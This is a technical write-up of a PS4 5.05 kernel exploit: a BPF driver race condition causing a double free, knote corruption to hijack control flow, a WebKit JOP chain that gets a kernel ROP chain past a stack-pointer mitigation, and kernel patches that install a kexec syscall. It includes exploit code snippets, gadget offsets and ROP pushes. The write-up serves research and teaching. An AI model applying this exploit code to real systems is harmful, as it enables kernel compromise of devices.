28 Jul 2018

PS4 5.05 BPF Double Free Kernel Exploit Writeup

Welcome to the 5.0x kernel exploit write-up. A few months ago, a kernel vulnerability was discovered by qwertyoruiopz and an exploit was released for BPF which involved crafting an out-of-bounds (OOB) write via use-after-free (UAF) due to the lack of proper locking. It was a fun bug, and a very trivial exploit. Sony then removed the write functionality from BPF, so that exploit was patched. However, the core issue still remained (being the lack of locking). A very similar race condition still exists in BPF past 4.55, which we will go into detail below on. The full source of the exploit can be found here.

Note: Similar to 4.55, this bug is interesting primarily for exploitation on the PS4, but it can also be used on other systems using the Berkeley Packet Filter VM if the attacker has sufficient permissions, so it’s been published under the “FreeBSD” folder.

If you found any mistakes or have suggestions to improve clarity on some points, either open an issue on this repo or reply them to this tweet. Thanks :)

This bug is no longer accessible however past 5.05 firmware, because the BPF driver has finally been blocked from unprivileged processes - WebKit can no longer open it.

Sony also introduced a new security mitigation in 5.0x firmwares to prevent the stack pointer from pointing into user space, however we’ll go more in detail on this a bit further down.

Assumptions

Some assumptions are made of the reader’s knowledge for the writeup. The avid reader should have a basic understanding of how memory allocators work - more specifically, how malloc() and free() allocate and deallocate memory respectively. They should also be aware that devices can be issued commands concurrently, as in, one command could be received while another one is being processed via threading. An understanding of C, x86, and exploitation basics is also very helpful, though not necessarily required.

Background

This section contains some helpful information to those newer to exploitation, or are unfamiliar with device drivers, or various exploit techniques such as heap spraying and race conditions. Feel free to skip to the “A Tale of Two Free()’s” section if you’re already familiar with this material.

What Are Drivers?

There are a few ways that applications can directly communicate with the operating system. One of which is system calls, which there are over 600 of in the PS4 kernel, ~500 of which are FreeBSD - the rest are Sony-implemented. Another method is through something called “Device Drivers”. Drivers are typically used to bridge the gap between software and hardware devices (usb drives, keyboard/mouse, webcams, etc) - though they can also be used just for software purposes.

There are a few operations that a userland application can perform on a driver (if it has sufficient permissions) to interface with it after opening it. In some instances, one can read from it, write to it, or in some cases, issue more complex commands to it via the ioctl() system call. The handlers for these commands are implemented in kernel space - this is important, because any bugs that could be exploited in an ioctl handler can be used as a privilege escalation straight to ring0 - typically the most privileged state.

Drivers are often the more weaker points of an operating system for attackers, because sometimes these drivers are written by developers who don’t understand how the kernel works, or the drivers are older and thus not wise to newer attack methods.

The BPF Device Driver

If we take a look around inside of WebKit’s sandbox, we’ll find a /dev directory. While this may seem like the root device driver path, it’s a lie. Many of the drivers that the PS4 has are not exposed to this directory, but rather only ones that are needed for WebKit’s operation (for the most part). For some reason though, BPF (aka. the “Berkeley Packet Filter”) device is not only exposed to WebKit’s sandbox - it also has the privileges to open the device as R/W. This is very odd, because on most systems this driver is root-only (and for good reason). If you want to read more into this, refer to my previous write-up with 4.55FW.

What Are Packet Filters?

Below is an excerpt from the 4.55 bpfwrite writeup.

Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by bpf_filter() (which are ran when packets are received). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside it’s buffer. Breaking down the BPF VM in it’s entirety is far beyond the scope of this write-up, just know that the code produced by it is ran in kernel mode - this is why read/write access to /dev/bpf should be privileged.

You can reference the opcodes that the BPF VM takes here.

Race Conditions

Race conditions occur when two processes/threads try to access a shared resource at the same time without mutual exclusion. The problem was ultimately solved by introducing concepts such as the “mutex” or “lock”. The idea is when one thread/process tries to access a resource, it will first acquire a lock, access it, then unlock it once it’s finished. If another thread/process tries to access it while the other has the lock, it will wait until the other thread is finished. This works fairly well - when it’s used properly.

Locking is hard to get right, especially when you try to implement fine-grained locking for performance. One single instruction or line of code outside the locking window could introduce a race condition. Not all race conditions are exploitable, but some are (such as this one) - and they can give an attacker very powerful bugs to work with.

Heap Spraying

The process of heap spraying is fairly simple - allocate a bunch of memory and fill it with controlled data in a loop and pray your allocation doesn’t get stolen from underneath you. It’s a very useful technique when exploiting something such as a use-after-free(), as you can use it to get controlled data into your target object’s backing memory.

By extension, it’s useful to do this for a double free() as well, because once we have a stale reference, we can use a heap spray to control the data. Since the object will be marked “free” - the allocator will eventually provide us with control over this memory, even though something else is still using it. That is, unless, something else has already stolen the pointer from you and corrupts it - then you’ll likely get a system crash, and that’s no fun. This is one factor that adds to the variance of exploits, and typically, the smaller the object, the more likely this is to happen.

A Tale of Two Free()’s

Via ioctl() command, a user can set a filter program on a given descriptor via commands such as BIOSETWF. There are other commands to set other filters, however the write filter is the only one interesting to us for this writeup. An important part of the previous exploit was the power to free() an older filter once a new one has been allocated, via bpf_setf(), which is called directly by BIOSETWF’s command handler. This allowed us to free() a filter while it was in use. This free() in itself is also a bug that can be exploited, and is leveraged in the newer exploit. Let’s take a look at bpf_setf() again.

src

static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd)
{
    struct bpf_insn *fcode, *old;

    // ...

    if (cmd == BIOCSETWF) {
        old = d->bd_wfilter; // <----- THIS ISN'T LOCKED :)
        wfilter = 1;
    }

    // ...
    if (fp->bf_insns == NULL) {
        // ...

        BPFD_LOCK(d);

        // ...

        BPFD_UNLOCK(d);

        if (old != NULL)
            free((caddr_t)old, M_BPF);

        return (0);
    }

    // ...
}

We can see that there are variables on the stack to hold filter pointers, including one for the old filter which eventually gets free()’d. If the ioctl command is set to BIOSETWF, the pointer from d->bd_wfilter is copied to the old stack variable.

Later on, we can see that they lock the BPF descriptor, and null the references to the filters. They lock the reference clearing, but what about the pointer of d->bd_wfilter being copied to the stack? As we’ve seen in previous exploits, multiple threads can run and use the same bpf_d object. If we were to race setting two filters in parallel, there’s a chance that both threads will copy the same pointer to their kernel stacks, eventually resulting in a double free as both pointers will be processed.

demonstration gif

Poisoning the Allocator

With a double free() primitive, we have the ability to achieve memory corruption on the kernel heap by poisoning the memory allocator. This essentially allows us to create a targetted use-after-free() (UAF) on an object allocated post-corruption.

Corrupting knotes

Summary

Similar to 1.76, the target object for this exploit that was used was the knote object. kqueue objects represent event queues for raising these events. knote lists are managed by the kqueue they are in. The knote object is used to represent a kernel event in memory, and are linked together by a singly linked list. Qwerty chose knote because of knote lists (called knlist), as it gives us some degree of control of the size. Let’s take a look at the structure (macros have been ommited for brevity sake).

src

struct knote {
    SLIST_ENTRY(knote)      kn_link;                /* for kq */
    SLIST_ENTRY(knote)      kn_selnext;             /* for struct selinfo */

    struct                  knlist *kn_knlist;      /* f_attach populated */
    TAILQ_ENTRY(knote)      kn_tqe;
    struct                  kqueue *kn_kq;          /* which queue we are on */
    struct                  kevent kn_kevent;
    int                     kn_status;              /* protected by kq lock */
    int                     kn_sfflags;             /* saved filter flags */
    intptr_t                kn_sdata;               /* saved data field */

    union {
        struct              file *p_fp;             /* file data pointer */
        struct              proc *p_proc;           /* proc pointer */
        struct              aiocblist *p_aio;       /* AIO job pointer */
        struct              aioliojob *p_lio;       /* LIO job pointer */ 
    } kn_ptr;

    struct                  filterops *kn_fop;      // <--- Of interest as an attacker, offset: 0x68
    void                    *kn_hook;
    int                     kn_hookid;
};

There’s an interesting field there, struct filterops *kn_fop at offset 0x68. This is essentially a table of function pointers that is referenced when something happens with the event, such as an attach or detach. The f_detach function pointer will be dereferenced and called when the kqueue and by extension the knote is being destroyed.

src

struct filterops {
    int     f_isfd;
    int     (*f_attach)(struct knote *kn);
    void    (*f_detach)(struct knote *kn);
    int     (*f_event)(struct knote *kn, long hint);
    void    (*f_touch)(struct knote *kn, struct kevent *kev, u_long type);
};

By corrupting the f_detach function pointer, hijacking of the instruction pointer and thus arbitrary code execution can be achieved when the object is destroyed via the destruction of the corrupted kqueue.

Exploit Overview

Our exploit strategy is targetting a UAF on the knote object to hijack the instruction pointer. Let’s break down the steps/stages for successful exploitation.

1) Open BPF descriptors, setup one NOP filter and one filter for heap spraying 2) Setup the fake knote object in WebKit’s heap for JOP. 3) Setup the kernel ROP chain 4) Start thread one 5) Start thread two

Thread 1 will do the following actions: 1) Create a kqueue via sys_kqueue() 2) Set a filter on the device in an attempt to poison the allocator 3) Trigger a kevent 4) Perform a heap spray in an attempt to achieve memory corruption 5) Close the kqueue (attempt to achieve code execution)

Thread 2 will simply continously attempt to set a write filter.

A poor mans SMAP

At some point in 5.0x, it seems Sony added some mitigation into the scheduler to check the stack pointer against userland addresses when running in kernel context, similar to the increasingly common “Supervisor Mode Access Prevention” (SMAP) mitigation found on modern systems. This turned an otherwise fairly trivial exploit into some complex kernel memory manipulation to run a kernel ROP (kROP) chain. To my knowledge this hasn’t been investigated very much, but attempting a simple stack pivot like we’ve done in previous exploits into userland memory will crash the kernel.

To avoid this, we need to get our ROP chain into kernel memory. To do this, qwerty decided to go with the method he used on the iPhone 7 - essentially using JOP to push a bunch of stack frames onto the kernel stack, and memcpy()‘ing the chain into RSP.

You can find a detailed annotation of the exploit here to assist in understanding it, as it does get quite complex.

JOP Explained

Software engineers have started getting wise to stack pivot techniques, and preventing the attacker from the ability to stack pivot into user-controlled memory is a pretty decent counter-measure, however, like everything, it is bypassable. JOP (jump oriented programming) is a way. You could use JOP to implement a full chain, or use it as a method of getting to ROP via getting your ROP chain into kernel memory. The latter is preferred, because implementing logic in JOP (while possible) can be a nightmare.

ROP vs. JOP

Return Oriented Programming (ROP) is essentially the process of creating a fake stack and pushing the address of gadgets to it, and pivotting RSP to it. Your chain of gadgets is then executed like a real callstack, and every time the ret instruction is hit, the next gadget in the chain is run.

Jump Oriented Programming (JOP) works a bit differently. Instead of ending your gadgets with a ret instruction, you end your gadgets with a jmp instruction. As long as you control the destination (maybe there’s a register you can influence the value of), you can chain it with other gadgets, without the need of using a fake stack. For instance, if you control the value of rax, your gadget can end with jmp rax. By setting the value of rax to the address of the next gadget, you can chain them.

With JOP you generally have to get more creative, because you’re even more limited on potential gadgets - this is why implementing full chains in JOP is not preferred.

src

Faking a knote

Now that we’ve covered the basics of what the exploit is and the basics of JOP, we’ll start through the process of exploiting the bug. The first thing we need to do is setup a fake knote object to spray the heap with. Luckily, faking this object is easy, there’s no need to fake a bunch of members for stability, we only need to fake a few members along with kn_fops, our target object. The ctxp buffer is used to setup our fake knote.

var ctxp  = p.malloc32(0x2000);    // ctxp = knote
p.write8(ctxp.add32(0), ctxp2);    // 0x00 = kn_link - not important for kqueue per se, but for the JOP gadget
p.write8(ctxp.add32(0x50), 0);     // 0x50 = kn_status = 0 (clear flags so detach is called)
p.write8(ctxp.add32(0x68), ctxp1); // 0x68 = kn_fops

Notice that we’ve set kn_fops to ctxp1 - this is the buffer for the fake kn_fops function table. The only thing we need to fake in this table is kn_fops->f_detach(), because this is the only function that will be called on kqueue destruction.

var ctxp1 = p.malloc32(0x2000);     // ctxp1 = knote->kn_fops
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // JOP gadget

As you can see, this is where we achieve arbitrary code execution, and we’re directing RIP to 0x12A19CD in WebKit. Here’s an x86 snippet of the relevant code for kqueue_close() - where control of the instruction pointer is achieved.

src

; Note: R14 = ctxp
seg000:FFFFFFFF89D29861                 test    byte ptr [r14+50h], 8      ; we set ctxp+0x50 to 0, so we're good
seg000:FFFFFFFF89D29866                 jnz     short loc_FFFFFFFF89D29872 ; irrelevant
seg000:FFFFFFFF89D29868                 mov     rax, [r14+68h]             ; r14 + 0x68 = ctxp1
seg000:FFFFFFFF89D2986C                 mov     rdi, r14                   ; r14 + 0x00 = ctxp2 = rdi
seg000:FFFFFFFF89D2986F                 call    qword ptr [rax+10h]        ; JOP gadget

Also notice that we control the rdi register here via the r14 register. Under normal circumstances, the knote object kn is loaded into rdi as it’s the first argument to kn->kn_fop->f_detach() - however because we have corruption on the knote - we can not only control where we jump to, but also the arguments. This is important for JOP, because the next jump in the first JOP gadget requires us to have control of the RDI register.

Code Execution

Creating space on the kstack

To push some space on the stack, we can use a JOP chain. We’ll use the variable stackshift_from_retaddr to track how much we’ve pushed on the stack. First we’ll run a function prologue, which will subtract from RSP, creating space for us to put our ROP chain into. This function prologue is our first JOP gadget at 0x12A19CD, which we setup previously in our fake knote that we sprayed.

seg000:00000000012A19CD                 sub     rsp, 58h
seg000:00000000012A19D1                 mov     [rbp-2Ch], edx
seg000:00000000012A19D4                 mov     r13, rdi
seg000:00000000012A19D7                 mov     r15, rsi
seg000:00000000012A19DA                 mov     rax, [r13+0]
seg000:00000000012A19DE                 call    qword ptr [rax+7D0h] // Implicitly subs 0x8 from rsp

At this point, we’re 0x5C away from the original stack pointer. Now remember, for JOP to work, we need to be able to control where code jumps next, which means we have to control rax. Luckily, we can see rax is loaded from r13+0, and r13 is set from rdi. As detailed above, we have corruption on rdi via the knote object. If we look at the previous section where the JOP gadget is called from the kernel, we set rdi to be ctxp2. The next gadget will be called at ctxp2 + 0x7D0, which we will set to 0x6EF4E5.

p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5));

seg000:00000000006EF4E5                 mov     rdi, [rdi+10h]
seg000:00000000006EF4E9                 jmp     qword ptr [rax]

This gadget will allow us to set rdi to a new value, and jump to rax, which is still equivalent to the address of ctxp2. Notice that this gadget allows us to loop, because we can write the first gadget to ctxp2, and set where the first gadget jumps to via rdi + 0x10.

var iterbase = ctxp2;

for (var i = 0; i < 0xf; i++) {                                       // loop 15 times
    p.write8(iterbase, offsetToWebKit(0x12A19CD));                    // first JOP gadget
    stackshift_from_retaddr += 8 
    p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // second JOP gadget
    p.write8(iterbase.add32(8), iterbase.add32(0x20));
    p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
    iterbase = iterbase.add32(0x20);                                  // setup next loop
}

Preparing memcpy call

Fundamentals

Now that we’ve created space on the stack, we want to copy our kernel ROP chain into it to get executed. Let’s take a look at memcpy()’s function signature:

void *memcpy(void *destination, const void *source, size_t num);

As defined in the x64 ABI (Application Binary Interface) - the following registers are used to pass arguments to functions:

rdi - first argument
rsi - second argument
rdx - third argument
rcx - fourth argument
r8 - fifth argument
r9 - sixth argument
[stack] - seven+ arguments

Therefore, the following registers are interesting to us for this memcpy call:

rdi (memory destination pointer)
rsi (memory source pointer)
rdx (size in bytes)

Setting Size

The first thing we’ll do is load RDX for the size. We can do this via another JOP gadget in WebKit at 0x15CA41B.

seg000:00000000015CA41B                 mov     rdx, [rdi+0B0h]
seg000:00000000015CA422                 call    qword ptr [rdi+70h]

We can write relative to RDI via the rdibase variable. By adding our shift plus 0x28 (offset for where we’re writing on the stack), we can load RDX with our chain length.

Setting Source

Next we’ll load the source pointer in RSI. We want this to point to where we’re writing our kernel ROP chain in userland. Similar to when we set the size, we’ll again look for a JOP gadget that can set RSI from memory relative to RDI. WebKit at 0x1284834 does the trick.

seg000:0000000001284834                 mov     rsi, [rdi+8]
seg000:0000000001284838                 mov     rdi, [rdi+18h]
seg000:000000000128483C                 mov     rax, [rdi]
seg000:000000000128483F                 call    qword ptr [rax+30h]

Setting Destination

Finally, we need to setup RDI so that it points to all of our fake stack frames that we pushed on the kernel stack. This turns out to be at RBP (base pointer) - 0x28. We can use another JOP gadget at 0x272961.

seg000:0000000000272961                 lea     rdi, [rbp-28h]
seg000:0000000000272965                 call    qword ptr [rax+40h]

Calling Memcpy

Now that the arguments are setup, we need to call memcpy(). Notice from our last JOP gadget, that the next place we jump to is setup based on [rax + 0x40]. This is where we want to write the address of memcpy() from userland. We’ll skip the function prologue and optimizations to avoid side-effects produced from our previous JOP gadgets.

p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90)); // skip prolog covering side effecting branch and skipping optimizations
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);

Exploit Debugging (Kind Of)

Summary

It was suggested to me that I should include a section containing some details on complications that occured. We’ve already detailed one of them, being the SMAP-like implementation, however another was the lack of debugging. At this point in time, we didn’t have a kernel debugging framework setup for working with the PS4. We did however have the ability to patch the kernel to enable UART and “verbose panic” information if we have an existing kernel exploit working. Of course though, once the system reboots, we no longer have access to UART nor verbose panic info even if we did.

Fatal Traps

Panic information that’s printed to the klog/UART can be a very helpful tool for debugging exploits (which is probably why Sony has it disabled in the first place). Below is an example of a standard page fault panic from klog:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 01
fault virtual address   = 0xffffde1704254000
fault code              = supervisor read instruction, protection violation
instruction pointer     = 0x20:0xffffde1704254000
stack pointer           = 0x28:0xffffff807119b220
frame pointer           = 0x28:0xffffff807119b2b0
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, long 1, def32 0, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 87 (infloopThr)

As you can see, some information here is extremely useful, especially the virtual address and the instruction pointer.

Complications

This information is fantastic when the system actually gives it to us. However, there are some cases where the system won’t. Often this seems to be because the crash happens in a critical section, such as inside free() directly. For more information on critical sections, see Critical Sections.

Other times, the reason we don’t get this information is unknown. If the panic information is unobtainable for us because we either don’t have an existing exploit or the information just won’t get printed to the klog, other tricks must be used, such as using infloop gadgets and other “hacky” exploit debugging techniques.

Patching the Kernel

Disabling Write Protection

Now that we have the ability to run kernel ROP chains due to our stack manipulation sorcery described in the last section, we can apply kernel patches after we disable kernel write protection via the cr0 register. We can do this by just flipping the write-protection bit at bit 16.

src cr0 table

krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);

Installing a Syscall (Kexec)

For brevity’s sake, I won’t cover all the patches in detail, however here’s a brief recap of the patches made in the ROP chain.

sys_setuid syscall       - remove permission check
sys_mmap syscall         - allow RWX mapping
amd64_syscall            - syscall instruction allowed anywhere
sys_dynlib_dlsym syscall - allow dynamic resolving from anywhere

The main goal of the chain is to install our own system call called kexec. This will allow us to execute arbitrary code in kernel mode easily from any application, no matter the privileges.

sys_kexec(void *code, void *uap);

Code such as jailbreaking and HEN are ran via kexec. Installing it is fairly easy, we just have to add an entry into sysent.

src

struct sysent {		        	/* system call table */
	int	sy_narg;	        /* number of arguments */
	sy_call_t *sy_call;	    	/* implementing function */
	au_event_t sy_auevent;		/* audit event associated with syscall */
	systrace_args_func_t sy_systrace_args_func;
				        /* optional argument conversion function. */
	u_int32_t sy_entry;	    	/* DTrace entry ID for systrace. */
	u_int32_t sy_return;		/* DTrace return ID for systrace. */
	u_int32_t sy_flags;	    	/* General flags for system calls. */
	u_int32_t sy_thrcnt;
};

By setting sy_call to a jmp qword ptr [rsi] gadget (which can be found in the kernel at offset 0x13460), sy_narg to 2, and sy_flags to SY_THR_STATIC (100000000), we can successfully insert a custom system call that executes code in ring0.

seg000:FFFFFFFF8AC38820                 dq 2                    ; Syscall #11
seg000:FFFFFFFF8AC38828                 dq 0FFFFFFFF89BCF460h
seg000:FFFFFFFF8AC38830                 dq 0
seg000:FFFFFFFF8AC38838                 dq 0
seg000:FFFFFFFF8AC38840                 dq 0
seg000:FFFFFFFF8AC38848                 dq 100000000h

Sony Patch

Again, not a real patch, but a Sony patch - though this time more effective. Opening BPF has been blocked for unprivileged processes such as WebKit and other apps/games. It’s still present in the sandbox, however attempting to open it will fail and yield EPERM.

Conclusion

Another cool bug to exploit. It should have been a trivial exploit, however Sony’s new mitigation that prevents exploit devs from pivotting RSP into userland memory while in kernel context is quite effective, and some tricks had to be used to get the chain into kernel memory - but as demonstrated, it is beatable. This exploit is also a good example of how double free()’s can be exploited fairly easily on FreeBSD if they’re on an object of decent size.

Thanks

qwertyoruiopz

flatz

Additional Thanks

TheFloW - Suggestions and Feedback

References

qwertyoruiopz : Detailed Annotation

qwertyoruiopz : Zero2Ring0 Slides

Watson FreeBSD Kernel Cross Reference

Marco Ramilli : From ROP to JOP

Wikipedia : Control register (cr0)

Wikipedia : Critical section